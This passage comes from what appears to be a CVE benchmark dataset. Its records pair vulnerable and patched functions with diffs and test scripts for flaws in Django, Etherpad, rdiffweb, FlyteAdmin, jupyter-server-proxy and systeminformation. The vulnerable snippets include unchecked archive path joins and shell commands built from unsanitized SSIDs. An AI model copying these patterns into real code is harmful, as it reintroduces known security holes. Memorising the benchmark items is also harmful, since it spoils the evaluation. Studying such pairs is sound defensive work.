\"un-reserved\" characters as safe that won't need quoting. The\n # un-reserved need to be marked safe to ensure the quote function behave\n # the same in py36 as py37.\n #\n # ref: https://tools.ietf.org/html/rfc3986#section-2.2\n client_path = quote(client_path, safe=\":/?#[]@!$&'()*+,;=-._~\")\n\n client_uri = '{protocol}://{host}:{port}{path}'.format(\n protocol=protocol,\n host=host,\n port=port,\n path=client_path,\n )\n if self.request.query:\n client_uri += '?' + self.request.query\n\n return client_uri"}, {"id": "fix_py_186_2", "commit": "fd31930", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 693, "end_line": 746, "snippet": "def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n web_app.add_handlers(\n \".*\",\n [\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/([^/:@]+):(\\d+)(/.*|)\",\n ),\n RemoteProxyHandler,\n {\n \"absolute_url\": False,\n \"host_allowlist\": host_allowlist,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/absolute/([^/:@]+):(\\d+)(/.*|)\",\n ),\n RemoteProxyHandler,\n {\n \"absolute_url\": True,\n \"host_allowlist\": host_allowlist,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/(\\d+)(/.*|)\",\n ),\n LocalProxyHandler,\n {\n \"absolute_url\": False,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/absolute/(\\d+)(/.*|)\",\n ),\n LocalProxyHandler,\n {\n \"absolute_url\": True,\n \"rewrite_response\": rewrite_response,\n },\n ),\n ],\n )"}], "vul_patch": "--- a/jupyter_server_proxy/handlers.py\n+++ b/jupyter_server_proxy/handlers.py\n@@ -1,9 +1,13 @@\n def get_client_uri(self, protocol, host, port, proxied_path):\n- context_path = self._get_context_path(host, port)\n if self.absolute_url:\n+ context_path = self._get_context_path(host, port)\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n+\n+ # ensure client_path always starts with '/'\n+ if not client_path.startswith(\"/\"):\n+ client_path = \"/\" + client_path\n \n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. To do this, we mark the RFC 3986 specs' \"reserved\"\n@@ -18,7 +22,7 @@\n protocol=protocol,\n host=host,\n port=port,\n- path=client_path\n+ path=client_path,\n )\n if self.request.query:\n client_uri += '?' + self.request.query\n\n--- a/jupyter_server_proxy/handlers.py\n+++ b/jupyter_server_proxy/handlers.py\n@@ -1,51 +1,54 @@\n def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n- web_app.add_handlers('.*', [\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/([^/]*):(\\d+)(.*)',\n+ web_app.add_handlers(\n+ \".*\",\n+ [\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/([^/:@]+):(\\d+)(/.*|)\",\n+ ),\n+ RemoteProxyHandler,\n+ {\n+ \"absolute_url\": False,\n+ \"host_allowlist\": host_allowlist,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- RemoteProxyHandler,\n- {\n- 'absolute_url': False,\n- 'host_allowlist': host_allowlist,\n- 'rewrite_response': rewrite_response,\n- }\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/absolute/([^/]*):(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/absolute/([^/:@]+):(\\d+)(/.*|)\",\n+ ),\n+ RemoteProxyHandler,\n+ {\n+ \"absolute_url\": True,\n+ \"host_allowlist\": host_allowlist,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- RemoteProxyHandler,\n- {\n- 'absolute_url': True,\n- 'host_allowlist': host_allowlist,\n- 'rewrite_response': rewrite_response,\n- }\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/(\\d+)(/.*|)\",\n+ ),\n+ LocalProxyHandler,\n+ {\n+ \"absolute_url\": False,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- LocalProxyHandler,\n- {\n- 'absolute_url': False,\n- 'rewrite_response': rewrite_response,\n- },\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/absolute/(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/absolute/(\\d+)(/.*|)\",\n+ ),\n+ LocalProxyHandler,\n+ {\n+ \"absolute_url\": True,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- LocalProxyHandler,\n- {\n- 'absolute_url': True,\n- 'rewrite_response': rewrite_response,\n- },\n- ),\n- ])\n+ ],\n+ )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-3281", "cve_description": "In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by \"startapp --template\" and \"startproject --template\") allows directory traversal via an archive with absolute paths or relative paths with dot segments.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/52e409ed17287e9aabda847b6afe58be2fa9f86a", "https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23", "https://github.com/django/django/commit/02e6592835b4559909aa3aaaf67988fef435f624", "https://github.com/django/django/commit/21e7622dec1f8612c85c2fc37fe8efbfd3311e37"], "programing_language": "Python", "vul_func": [{"id": "vul_py_9_1", "commit": "03a8678", "file_path": "django/utils/archive.py", "start_line": 151, "end_line": 179, "snippet": " def extract(self, to_path):\n members = self._archive.getmembers()\n leading = self.has_leading_dir(x.name for x in members)\n for member in members:\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = os.path.join(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n else:\n try:\n extracted = self._archive.extractfile(member)\n except (KeyError, AttributeError) as exc:\n # Some corrupt tar files seem to produce this\n # (specifically bad symlinks)\n print(\"In the tar file %s the member %s is invalid: %s\" %\n (name, member.name, exc))\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n shutil.copyfileobj(extracted, outfile)\n self._copy_permissions(member.mode, filename)\n finally:\n if extracted:\n extracted.close()"}, {"id": "vul_py_9_2", "commit": "03a8678", "file_path": "django/utils/archive.py", "start_line": 193, "end_line": 213, "snippet": " def extract(self, to_path):\n namelist = self._archive.namelist()\n leading = self.has_leading_dir(namelist)\n for name in namelist:\n data = self._archive.read(name)\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = os.path.join(to_path, name)\n if filename.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, exist_ok=True)\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n outfile.write(data)\n # Convert ZipInfo.external_attr to mode\n mode = info.external_attr >> 16\n self._copy_permissions(mode, filename)"}], "fix_func": [{"id": "fix_py_9_1", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 160, "end_line": 188, "snippet": " def extract(self, to_path):\n members = self._archive.getmembers()\n leading = self.has_leading_dir(x.name for x in members)\n for member in members:\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = self.target_filename(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n else:\n try:\n extracted = self._archive.extractfile(member)\n except (KeyError, AttributeError) as exc:\n # Some corrupt tar files seem to produce this\n # (specifically bad symlinks)\n print(\"In the tar file %s the member %s is invalid: %s\" %\n (name, member.name, exc))\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n shutil.copyfileobj(extracted, outfile)\n self._copy_permissions(member.mode, filename)\n finally:\n if extracted:\n extracted.close()"}, {"id": "fix_py_9_2", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 202, "end_line": 224, "snippet": " def extract(self, to_path):\n namelist = self._archive.namelist()\n leading = self.has_leading_dir(namelist)\n for name in namelist:\n data = self._archive.read(name)\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n if not name:\n continue\n filename = self.target_filename(to_path, name)\n if name.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, exist_ok=True)\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n outfile.write(data)\n # Convert ZipInfo.external_attr to mode\n mode = info.external_attr >> 16\n self._copy_permissions(mode, filename)"}, {"id": "fix_py_9_3", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 138, "end_line": 143, "snippet": " def target_filename(self, to_path, name):\n target_path = os.path.abspath(to_path)\n filename = os.path.abspath(os.path.join(target_path, name))\n if not filename.startswith(target_path):\n raise SuspiciousOperation(\"Archive contains invalid path: '%s'\" % name)\n return filename"}], "vul_patch": "--- a/django/utils/archive.py\n+++ b/django/utils/archive.py\n@@ -5,7 +5,7 @@\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n- filename = os.path.join(to_path, name)\n+ filename = self.target_filename(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n\n--- a/django/utils/archive.py\n+++ b/django/utils/archive.py\n@@ -6,8 +6,10 @@\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n- filename = os.path.join(to_path, name)\n- if filename.endswith(('/', '\\\\')):\n+ if not name:\n+ continue\n+ filename = self.target_filename(to_path, name)\n+ if name.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, exist_ok=True)\n else:\n\n--- /dev/null\n+++ b/django/utils/archive.py\n@@ -0,0 +1,6 @@\n+ def target_filename(self, to_path, name):\n+ target_path = os.path.abspath(to_path)\n+ filename = os.path.abspath(os.path.join(target_path, name))\n+ if not filename.startswith(target_path):\n+ raise SuspiciousOperation(\"Archive contains invalid path: '%s'\" % name)\n+ return filename\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-3281:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-3281/bin/python ./runtests.py utils_tests.test_archive.TestArchiveInvalid.test_extract_function_traversal\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-3281:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-3281/bin/python ./runtests.py utils_tests.test_archive \n"} {"cve_id": "CVE-2018-6835", "cve_description": "node/hooks/express/apicalls.js in Etherpad Lite before v1.6.3 mishandles JSONP, which allows remote attackers to bypass intended access restrictions.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/ether/etherpad-lite", "patch_url": ["https://github.com/ether/etherpad-lite/commit/626e58cc5af1db3691b41fca7b06c28ea43141b1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_195_1", "commit": "d7c93b0", "file_path": "src/node/hooks/express/apicalls.js", "start_line": 8, "end_line": 29, "snippet": "var apiCaller = function(req, res, fields) {\n res.header(\"Content-Type\", \"application/json; charset=utf-8\");\n\n apiLogger.info(\"REQUEST, v\"+ req.params.version + \":\" + req.params.func + \", \" + JSON.stringify(fields));\n\n //wrap the send function so we can log the response\n //note: res._send seems to be already in use, so better use a \"unique\" name\n res._____send = res.send;\n res.send = function (response) {\n response = JSON.stringify(response);\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n\n //is this a jsonp call, if yes, add the function call\n if(req.query.jsonp)\n response = req.query.jsonp + \"(\" + response + \")\";\n\n res._____send(response);\n }\n\n //call the api handler\n apiHandler.handle(req.params.version, req.params.func, fields, req, res);\n}"}], "fix_func": [{"id": "fix_js_195_1", "commit": "626e58c", "file_path": "src/node/hooks/express/apicalls.js", "start_line": 8, "end_line": 29, "snippet": "var apiCaller = function(req, res, fields) {\n res.header(\"Content-Type\", \"application/json; charset=utf-8\");\n\n apiLogger.info(\"REQUEST, v\"+ req.params.version + \":\" + req.params.func + \", \" + JSON.stringify(fields));\n\n //wrap the send function so we can log the response\n //note: res._send seems to be already in use, so better use a \"unique\" name\n res._____send = res.send;\n res.send = function (response) {\n response = JSON.stringify(response);\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n\n //is this a jsonp call, if yes, add the function call\n if(req.query.jsonp && isVarName(response))\n response = req.query.jsonp + \"(\" + response + \")\";\n\n res._____send(response);\n }\n\n //call the api handler\n apiHandler.handle(req.params.version, req.params.func, fields, req, res);\n}"}], "vul_patch": "--- a/src/node/hooks/express/apicalls.js\n+++ b/src/node/hooks/express/apicalls.js\n@@ -11,7 +11,7 @@\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n \n //is this a jsonp call, if yes, add the function call\n- if(req.query.jsonp)\n+ if(req.query.jsonp && isVarName(response))\n response = req.query.jsonp + \"(\" + response + \")\";\n \n res._____send(response);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-3457", "cve_description": "Origin Validation Error in GitHub repository ikus060/rdiffweb prior to 2.5.0a5.", "cwe_info": {"CWE-346": {"name": "Origin Validation Error", "description": "The product does not properly verify that the source of data or communication is valid."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/afc1bdfab5161c74012ff2590a6ec49cc0d8fde0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_420_1", "commit": "8becdaf", "file_path": "rdiffweb/tools/secure_headers.py", "start_line": 34, "end_line": 109, "snippet": "def set_headers(\n xfo='DENY',\n no_cache=True,\n referrer='same-origin',\n nosniff=True,\n xxp='1; mode=block',\n csp=\"default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'\",\n):\n \"\"\"\n This tool provide CSRF mitigation.\n\n * Define X-Frame-Options = DENY\n * Define Cookies SameSite=Lax\n * Define Cookies Secure when https is detected\n * Validate `Origin` and `Referer` on POST, PUT, PATCH, DELETE\n * Define Cache-Control by default\n * Define Referrer-Policy to 'same-origin'\n\n Ref.:\n https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html\n https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html\n \"\"\"\n request = cherrypy.request\n response = cherrypy.serving.response\n\n # Check if Origin matches our target.\n if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n if origin and not origin.startswith(request.base):\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n\n # Check if https is enabled\n https = request.base.startswith('https')\n\n # Define X-Frame-Options to avoid Clickjacking\n if xfo:\n response.headers['X-Frame-Options'] = xfo\n\n # Enforce security on cookies\n cookie = response.cookie.get('session_id', None)\n if cookie:\n # Awaiting bug fix in cherrypy\n # https://github.com/cherrypy/cherrypy/issues/1767\n # Force SameSite to Lax\n cookie['samesite'] = 'Lax'\n if https:\n cookie['secure'] = 1\n\n # Add Cache-Control to avoid storing sensible information in Browser cache.\n if no_cache:\n response.headers['Cache-control'] = 'no-cache, no-store, must-revalidate, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n response.headers['Expires'] = '0'\n\n # Add Referrer-Policy\n if referrer:\n response.headers['Referrer-Policy'] = referrer\n\n # Add X-Content-Type-Options to avoid browser to \"sniff\" to content-type\n if nosniff:\n response.headers['X-Content-Type-Options'] = 'nosniff'\n\n # Add X-XSS-Protection to enabled XSS protection\n if xxp:\n response.headers['X-XSS-Protection'] = xxp\n\n # Add Content-Security-Policy\n if csp:\n response.headers['Content-Security-Policy'] = csp\n\n # Add Strict-Transport-Security to force https use.\n if https:\n response.headers['Strict-Transport-Security'] = \"max-age=31536000; includeSubDomains\"\n\n\ncherrypy.tools.secure_headers = cherrypy.Tool('before_request_body', set_headers, priority=71)"}], "fix_func": [{"id": "fix_py_420_1", "commit": "afc1bdfab5161c74012ff2590a6ec49cc0d8fde0", "file_path": "rdiffweb/tools/secure_headers.py", "start_line": 34, "end_line": 109, "snippet": "def set_headers(\n xfo='DENY',\n no_cache=True,\n referrer='same-origin',\n nosniff=True,\n xxp='1; mode=block',\n csp=\"default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'\",\n):\n \"\"\"\n This tool provide CSRF mitigation.\n\n * Define X-Frame-Options = DENY\n * Define Cookies SameSite=Lax\n * Define Cookies Secure when https is detected\n * Validate `Origin` and `Referer` on POST, PUT, PATCH, DELETE\n * Define Cache-Control by default\n * Define Referrer-Policy to 'same-origin'\n\n Ref.:\n https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html\n https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html\n \"\"\"\n request = cherrypy.request\n response = cherrypy.serving.response\n\n # Check if Origin matches our target.\n if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n if origin and origin != request.base:\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n\n # Check if https is enabled\n https = request.base.startswith('https')\n\n # Define X-Frame-Options to avoid Clickjacking\n if xfo:\n response.headers['X-Frame-Options'] = xfo\n\n # Enforce security on cookies\n cookie = response.cookie.get('session_id', None)\n if cookie:\n # Awaiting bug fix in cherrypy\n # https://github.com/cherrypy/cherrypy/issues/1767\n # Force SameSite to Lax\n cookie['samesite'] = 'Lax'\n if https:\n cookie['secure'] = 1\n\n # Add Cache-Control to avoid storing sensible information in Browser cache.\n if no_cache:\n response.headers['Cache-control'] = 'no-cache, no-store, must-revalidate, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n response.headers['Expires'] = '0'\n\n # Add Referrer-Policy\n if referrer:\n response.headers['Referrer-Policy'] = referrer\n\n # Add X-Content-Type-Options to avoid browser to \"sniff\" to content-type\n if nosniff:\n response.headers['X-Content-Type-Options'] = 'nosniff'\n\n # Add X-XSS-Protection to enabled XSS protection\n if xxp:\n response.headers['X-XSS-Protection'] = xxp\n\n # Add Content-Security-Policy\n if csp:\n response.headers['Content-Security-Policy'] = csp\n\n # Add Strict-Transport-Security to force https use.\n if https:\n response.headers['Strict-Transport-Security'] = \"max-age=31536000; includeSubDomains\"\n\n\ncherrypy.tools.secure_headers = cherrypy.Tool('before_request_body', set_headers, priority=71)"}], "vul_patch": "--- a/rdiffweb/tools/secure_headers.py\n+++ b/rdiffweb/tools/secure_headers.py\n@@ -26,7 +26,7 @@\n # Check if Origin matches our target.\n if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n- if origin and not origin.startswith(request.base):\n+ if origin and origin != request.base:\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n \n # Check if https is enabled\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31145", "cve_description": "FlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. In versions 1.1.30 and prior, authenticated users using an external identity provider can continue to use Access Tokens and ID Tokens even after they expire. Users who use FlyteAdmin as the OAuth2 Authorization Server are unaffected by this issue. A patch is available on the `master` branch of the repository. As a workaround, rotating signing keys immediately will invalidate all open sessions and force all users to attempt to obtain new tokens. Those who use this workaround should continue to rotate keys until FlyteAdmin has been upgraded and hide FlyteAdmin deployment ingress URL from the internet.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/flyteorg/flyteadmin", "patch_url": ["https://github.com/flyteorg/flyteadmin/commit/a1ec282d02706e074bc4986fd0412e5da3b9d00a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_65_1", "commit": "f18839d", "file_path": "auth/authzserver/resource_server.go", "start_line": 30, "end_line": 42, "snippet": "func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n\traw, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaimsRaw := map[string]interface{}{}\n\tif err = json.Unmarshal(raw, &claimsRaw); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to unmarshal user info claim into UserInfo type. Error: %w\", err)\n\t}\n\n\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), claimsRaw)\n}"}], "fix_func": [{"id": "fix_go_65_1", "commit": "a1ec282d02706e074bc4986fd0412e5da3b9d00a", "file_path": "auth/authzserver/resource_server.go", "start_line": 31, "end_line": 47, "snippet": "func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n\t_, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tt, _, err := jwtgo.NewParser().ParseUnverified(tokenStr, jwtgo.MapClaims{})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to parse token: %v\", err)\n\t}\n\n\tif err = t.Claims.Valid(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to validate token: %v\", err)\n\t}\n\n\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), t.Claims.(jwtgo.MapClaims))\n}"}, {"id": "fix_go_65_2", "commit": "a1ec282d02706e074bc4986fd0412e5da3b9d00a", "file_path": "auth/authzserver/resource_server.go", "start_line": 7, "end_line": 7, "snippet": "\tjwtgo \"github.com/golang-jwt/jwt/v4\""}], "vul_patch": "--- a/auth/authzserver/resource_server.go\n+++ b/auth/authzserver/resource_server.go\n@@ -1,13 +1,17 @@\n func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n-\traw, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n+\t_, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n \n-\tclaimsRaw := map[string]interface{}{}\n-\tif err = json.Unmarshal(raw, &claimsRaw); err != nil {\n-\t\treturn nil, fmt.Errorf(\"failed to unmarshal user info claim into UserInfo type. Error: %w\", err)\n+\tt, _, err := jwtgo.NewParser().ParseUnverified(tokenStr, jwtgo.MapClaims{})\n+\tif err != nil {\n+\t\treturn nil, fmt.Errorf(\"failed to parse token: %v\", err)\n \t}\n \n-\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), claimsRaw)\n+\tif err = t.Claims.Valid(); err != nil {\n+\t\treturn nil, fmt.Errorf(\"failed to validate token: %v\", err)\n+\t}\n+\n+\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), t.Claims.(jwtgo.MapClaims))\n }\n\n--- /dev/null\n+++ b/auth/authzserver/resource_server.go\n@@ -0,0 +1 @@\n+\tjwtgo \"github.com/golang-jwt/jwt/v4\"\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-31145:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/flyteadmin\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestResourceServer_ValidateAccessToken$ github.com/flyteorg/flyteadmin/auth/authzserver\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-31145:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/flyteadmin\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestEncryptDecrypt|TestAuthCallbackEndpoint|Test_unmarshalResp|TestGetIssuer|TestResourceServer_ValidateAccessToken|TestAuthEndpoint|Test_getJwksForIssuer|Test_doRequest|TestNewOAuth2ResourceServer)$' github.com/flyteorg/flyteadmin/auth/authzserver\n"} {"cve_id": "CVE-2024-56334", "cve_description": "systeminformation is a System and OS information library for node.js. In affected versions SSIDs are not sanitized when before they are passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands. This vulnerability may enable an attacker, depending on how the package is used, to perform remote code execution or local privilege escalation. This issue has been addressed in version 5.23.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/sebhildebrandt/systeminformation", "patch_url": ["https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_285_1", "commit": "51c7698b91789e00d2308c9f95249ca3bb27a176", "file_path": "lib/network.js", "start_line": 347, "end_line": 356, "snippet": "function getWindowsWirelessIfaceSSID(interfaceName) {\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n const parseSSID = SSID.split(':').pop();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n }\n}"}, {"id": "vul_js_285_2", "commit": "51c7698b91789e00d2308c9f95249ca3bb27a176", "file_path": "lib/network.js", "start_line": 357, "end_line": 421, "snippet": "function getWindowsIEEE8021x(connectionType, iface, ifaces) {\n let i8021x = {\n state: 'Unknown',\n protocol: 'Unknown',\n };\n\n if (ifaces === 'Disabled') {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n return i8021x;\n }\n\n if (connectionType == 'wired' && ifaces.length > 0) {\n try {\n // Get 802.1x information by interface name\n const iface8021xInfo = ifaces.find((element) => {\n return element.includes(iface + '\\r\\n');\n });\n const arrayIface8021xInfo = iface8021xInfo.split('\\r\\n');\n const state8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('802.1x');\n });\n\n if (state8021x.includes('Disabled')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n } else if (state8021x.includes('Enabled')) {\n const protocol8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('EAP');\n });\n i8021x.protocol = protocol8021x.split(':').pop();\n i8021x.state = 'Enabled';\n }\n } catch (error) {\n return i8021x;\n }\n } else if (connectionType == 'wireless') {\n\n let i8021xState = '';\n let i8021xProtocol = '';\n\n\n\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n i8021xState = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"802.1X\"`, util.execOptsWin);\n i8021xProtocol = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n\n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n i8021x.state = i8021xState.split(':').pop();\n i8021x.protocol = i8021xProtocol.split(':').pop();\n }\n } catch (error) {\n if (error.status === 1 && error.stdout.includes('AutoConfig')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n }\n return i8021x;\n }\n }\n\n return i8021x;\n}"}], "fix_func": [{"id": "fix_js_285_1", "commit": "f7af0a67b78e7894335a6cad510566a25e06ae41", "file_path": "lib/network.js", "start_line": 347, "end_line": 356, "snippet": "function getWindowsWirelessIfaceSSID(interfaceName) {\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n const parseSSID = SSID.split(':').pop().trim();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n }\n}"}, {"id": "fix_js_285_2", "commit": "f7af0a67b78e7894335a6cad510566a25e06ae41", "file_path": "lib/network.js", "start_line": 357, "end_line": 431, "snippet": "function getWindowsIEEE8021x(connectionType, iface, ifaces) {\n let i8021x = {\n state: 'Unknown',\n protocol: 'Unknown',\n };\n\n if (ifaces === 'Disabled') {\n i8021x.state = 'Disabled';\n 